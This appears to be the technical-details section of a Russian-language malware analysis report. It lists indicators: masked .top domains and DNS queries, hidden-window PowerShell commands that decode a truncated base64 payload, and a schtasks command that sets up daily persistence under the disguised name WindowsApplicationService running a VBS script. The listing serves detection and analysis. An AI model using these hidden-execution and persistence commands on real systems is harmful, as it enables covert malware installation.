Техническая информация
- <SYSTEM32>\tasks\windowsapplicationservice
- 'z2###da2mjc.top':80
- DNS ASK z2###da2mjc.top
- DNS ASK z2###da3mjc.top
- DNS ASK nm###da3mjc.top
- DNS ASK c3###da3mjc.top
- DNS ASK rl###da3mjc.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRjemRhYmZ5ZnYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoIC...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRjemRhYmZ5ZnYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoIC...
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs